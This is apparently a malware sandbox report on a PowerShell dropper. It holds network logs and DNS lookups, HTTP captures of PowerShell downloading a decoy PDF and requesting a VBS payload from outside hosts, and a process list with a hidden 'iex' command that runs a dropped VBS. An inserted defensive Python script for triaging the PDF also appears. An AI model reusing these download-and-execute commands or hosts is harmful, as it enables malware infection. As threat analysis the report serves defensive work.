                                                                                        Dec 19, 2024 12:45:13.764139891 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764147997 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.764170885 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764192104 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.770838022 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.770883083 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.771025896 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.771035910 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.771285057 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777719021 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777764082 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777801991 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777815104 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.777834892 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.777856112 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.785574913 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785630941 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785661936 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.785693884 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.785706997 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.787350893 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792589903 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792651892 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792668104 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792679071 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.792690992 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.792721033 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.936774969 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.936811924 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.936908960 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.936939001 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.937263966 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943006039 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943031073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943075895 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943110943 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.943128109 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.943156004 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950766087 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950812101 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950841904 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950865030 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.950880051 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.950984001 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958039045 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958070993 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958125114 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958142996 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.958165884 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.958178997 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963505983 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963545084 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963588953 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963617086 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.963629961 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.963660955 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.970040083 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970071077 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970145941 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.970155954 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.970271111 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.976393938 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976422071 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976485968 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.976497889 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.976676941 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983541965 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983566999 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983628988 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983639002 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.983685970 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.983700037 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128093958 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128130913 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128185034 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128202915 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.128232002 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.128247023 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.129410028 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129477978 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.129483938 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129499912 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.129545927 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.132249117 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:14.489430904 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.610332966 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:14.610477924 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.610598087 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:14.731065035 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:16.145333052 CET8049723203.175.174.69192.168.2.10
                                                                                        Dec 19, 2024 12:45:16.186532974 CET4972380192.168.2.10203.175.174.69
                                                                                        Dec 19, 2024 12:45:20.135588884 CET4972380192.168.2.10203.175.174.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:45:10.519990921 CET | 65317 | 53 | 192.168.2.10 | 1.1.1.1
Dec 19, 2024 12:45:10.659085035 CET | 53 | 65317 | 1.1.1.1 | 192.168.2.10
Dec 19, 2024 12:45:14.282329082 CET | 57955 | 53 | 192.168.2.10 | 1.1.1.1
Dec 19, 2024 12:45:14.488712072 CET | 53 | 57955 | 1.1.1.1 | 192.168.2.10
Dec 19, 2024 12:45:24.679056883 CET | 60532 | 53 | 192.168.2.10 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:45:10.519990921 CET | 192.168.2.10 | 1.1.1.1 | 0x12eb | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:45:14.282329082 CET | 192.168.2.10 | 1.1.1.1 | 0xadbc | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:45:24.679056883 CET | 192.168.2.10 | 1.1.1.1 | 0xe4b1 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:45:10.659085035 CET | 1.1.1.1 | 192.168.2.10 | 0x12eb | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:45:10.659085035 CET | 1.1.1.1 | 192.168.2.10 | 0x12eb | No error (0) | astenterprises.com.pk | - | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:45:14.488712072 CET | 1.1.1.1 | 192.168.2.10 | 0xadbc | No error (0) | www.bluemaxxlaser.com | - | 203.175.174.69 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:45:24.818532944 CET | 1.1.1.1 | 192.168.2.10 | 0xe4b1 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:46:51.791292906 CET | 1.1.1.1 | 192.168.2.10 | 0x93b3 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:46:51.791292906 CET | 1.1.1.1 | 192.168.2.10 | 0x93b3 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                                        • www.astenterprises.com.pk
                                                                                        • www.bluemaxxlaser.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49723 | 203.175.174.69 | 80 | 7804 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 12:45:14.610598087 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
Host: www.bluemaxxlaser.com
Connection: Keep-Alive
Dec 19, 2024 12:45:16.145333052 CET | 516 | IN | HTTP/1.1 404 Not Found
Date: Thu, 19 Dec 2024 11:45:15 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Raw: (hex dump omitted; same content as Data Ascii below)
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49718 | 107.161.23.150 | 443 | 7804 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:45:11 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
Host: www.astenterprises.com.pk
Connection: Keep-Alive
2024-12-19 11:45:12 UTC | 217 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/pdf
last-modified: Sun, 28 Jan 2024 19:03:01 GMT
accept-ranges: bytes
content-length: 871324
date: Thu, 19 Dec 2024 11:45:12 GMT
server: LiteSpeed
2024-12-19 11:45:12 UTC | 16384 | IN | Data Raw: (hex dump omitted; see Data Ascii below)
Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
2024-12-19 11:45:12 UTC | 16384 | IN | Data Raw: (hex dump of binary PDF content omitted)
2024-12-19 11:45:12 UTC | 16384 | IN | Data Raw: (hex dump of binary PDF content omitted)
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                        Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                        Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                        Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                        Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                        Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                        2024-12-19 11:45:13 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                        Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                        2024-12-19 11:45:13 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                        Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z
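The captured response above declares `content-type: application/pdf` and `content-length: 871324`, while the first bytes of the body carry a `%PDF-1.7` signature and a linearization dictionary whose `/L` entry reads 653248. The following Python script is an added triage example, not part of the report or of the sample: it converts a Joe Sandbox "Data Raw" line back to bytes, checks the declared type against the magic number, and compares the linearized `/L` length (the total file length at the time of linearization) with the server's Content-Length. The header block and the opening bytes are copied from the capture above; the body is truncated to the first object. A mismatch between `/L` and the delivered size only means the file was modified after linearization (an incremental save or appended data); it is a pointer to inspect the tail of the file, not proof of a payload.

```python
import re

# Response headers and the first bytes of the body, copied from the HTTP
# response captured in the sandbox report (body truncated to the opening
# linearization dictionary; the full transfer was 871324 bytes).
RESPONSE_HEADERS = """Connection: close
content-type: application/pdf
last-modified: Sun, 28 Jan 2024 19:03:01 GMT
accept-ranges: bytes
content-length: 871324
date: Thu, 19 Dec 2024 11:45:12 GMT
server: LiteSpeed"""

DATA_RAW = (
    "25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d "
    "3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 "
    "31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 "
    "5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a"
)

# Magic numbers worth telling apart when a server claims "application/pdf".
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"MZ", "mz"),           # PE executable
    (b"PK\x03\x04", "zip"),  # also docx/xlsx/jar
    (b"\x7fELF", "elf"),
]


def parse_headers(text):
    """Header block -> dict keyed by lower-cased header name."""
    headers = {}
    for line in text.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def data_raw_to_bytes(hexdump):
    """Joe Sandbox 'Data Raw' lines are space-separated hex octets."""
    return bytes.fromhex(hexdump)


def sniff(data):
    """Return the file kind implied by the leading bytes."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def pdf_version(data):
    m = re.match(rb"%PDF-(\d\.\d)", data)
    return m.group(1).decode() if m else None


def linearized_length(data):
    """/L in the first object of a linearized PDF is the length in bytes of the
    whole file as it was when it was linearized (ISO 32000-1, Annex F)."""
    m = re.search(rb"/Linearized\s+1\b.*?/L\s+(\d+)", data, re.S)
    return int(m.group(1)) if m else None


def triage_download(header_text, hexdump):
    """Cross-check declared headers against what the body actually contains."""
    headers = parse_headers(header_text)
    data = data_raw_to_bytes(hexdump)
    result = {
        "declared_type": headers.get("content-type"),
        "declared_length": int(headers["content-length"]) if "content-length" in headers else None,
        "magic": sniff(data),
        "pdf_version": pdf_version(data),
        "linearized_length": linearized_length(data),
        "findings": [],
    }
    if result["declared_type"] == "application/pdf" and result["magic"] != "pdf":
        result["findings"].append(f"content-type says PDF but body starts as {result['magic']}")
    lin, declared = result["linearized_length"], result["declared_length"]
    if lin is not None and declared is not None and lin != declared:
        result["findings"].append(
            f"length mismatch: linearized /L {lin} vs Content-Length {declared} "
            f"({declared - lin:+d} bytes); file changed after linearization "
            "(incremental update or appended data), inspect the tail")
    return result


if __name__ == "__main__":
    for key, value in triage_download(RESPONSE_HEADERS, DATA_RAW).items():
        print(f"{key}: {value}")
```

Run against the capture above, the script reports a PDF 1.7 body that is consistent with the declared type, and a 218076-byte difference between `/L` and Content-Length, which is the part of the file worth carving out and looking at next.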
                                                                                        Target ID:5
                                                                                        Start time:06:44:59
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1"
                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:06:44:59
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff620390000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:06:45:01
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:06:45:13
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                        Imagebase:0x7ff64eb90000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
